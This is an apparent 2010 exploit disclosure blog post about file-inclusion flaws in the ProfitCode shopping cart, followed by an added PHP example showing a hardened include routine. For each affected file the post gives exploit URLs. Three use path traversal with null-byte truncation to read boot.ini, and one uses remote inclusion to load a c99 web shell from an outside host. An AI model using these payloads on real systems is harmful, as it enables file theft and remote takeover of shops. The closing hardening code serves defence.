ProfitCode Shopping Cart Multiple LFI/RFI Vulnerabilities
January 13, 2010, 10:54 am
Filed under: Hack | Tags: bot, exploits, Hack, hacking, LFI, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
- There are a couple of pages that have the LFI vuln

Vuln c0de : dl-authcontent.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$returlvar = "dloads";
include "$docroot" . "tplates/usrauthlogin.php";
exit;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit:
http://server/store/dloads/dloadsmainincs/dl-authcontent.php?docroot=[LFI]
Sample:
http://server/store/dloads/dloadsmainincs/dl-authcontent.php?docroot=../../../../../boot.ini%00
***************************************************************************************************

Vuln c0de : dl-maincatsearch-dlcontent.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include("$docroot" . "shopincs/catpgtop$langFile.php");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit:
http://server/store/dloads/dloadsmainincs/dl-maincatsearch-dlcontent.php?docroot=[LFI]
Sample:
http://server/store/dloads/dloadsmainincs/dl-maincatsearch-dlcontent.php?docroot=../../../../../boot.ini%00
***************************************************************************************************

Vuln c0de : dloads-payed.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include "$docroot" . "tplates/usrauthlogin.php";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit:
http://server/store/dloads/dloadstplates/dloads-payed.php?docroot=[LFI]
Sample:
http://server/store/dloads/dloadstplates/dloads-payed.php?docroot=.../../../../../../../../boot.ini%00
************************************************************************

- For some reason this one comes up with an RFI

Vuln c0de : dloads-header.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include "$docroot" . "dloads/dloadsmainincs/inc-dloadsfunctions.php";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit:
http://server/store/dloads/dloads-header.php?docroot=[RFI]
Sample:
http://server/store/dloads/dloads-header.php?docroot=http://www.cfsm.cn/c99.txt?%00
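Added example, not from the advisory or from ProfitCode: the include pattern reported in all four files above, beside a hardened version that never builds the include base from the request and validates the only variable part; APP_ROOT, ALLOWED_LANGS and the function names are assumptions.

```php
<?php
// Added example, not ProfitCode's code. APP_ROOT, ALLOWED_LANGS and the
// function names are assumptions for illustration.

// Vulnerable pattern from dl-authcontent.php: $docroot arrives straight from
// the request (register_globals or an explicit $_GET read), so a value such
// as "../../../../../boot.ini%00" reaches include() unchecked. Before PHP
// 5.3.4 the %00 truncated the appended "tplates/..." suffix, and with
// allow_url_include enabled an "http://..." value turns the same bug into RFI,
// which is why dloads-header.php behaves as RFI on some servers.
function vulnerable_include_path(array $get): string
{
    $docroot = $get['docroot'];
    return $docroot . "tplates/usrauthlogin.php";   // what include() receives
}

// Hardened form: the include base is never taken from the request. The only
// variable part (the $langFile suffix seen in catpgtop$langFile.php) is
// checked against a whitelist, the path is resolved with realpath(), and the
// result must still lie under APP_ROOT.
define('APP_ROOT', __DIR__);                        // assumed deployment root
const ALLOWED_LANGS = ['', '-en', '-de', '-fr'];    // assumed language suffixes

function safe_include_path(string $template, string $langFile = ''): string
{
    if (!in_array($langFile, ALLOWED_LANGS, true)) {
        throw new InvalidArgumentException('unknown language file');
    }
    $base = realpath(APP_ROOT);
    // realpath() returns false for missing files and for stream wrappers
    // (http://, php://, data:), and PHP >= 5.3.4 rejects NUL bytes in path
    // arguments, so traversal, %00 truncation and remote URLs all fail here
    // rather than inside include().
    $candidate = realpath($base . '/shopincs/' . $template . $langFile . '.php');
    if ($candidate === false
        || strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('include path outside application root');
    }
    return $candidate;
}

// Usage in place of the original include:
// include safe_include_path('catpgtop', $langFile);
```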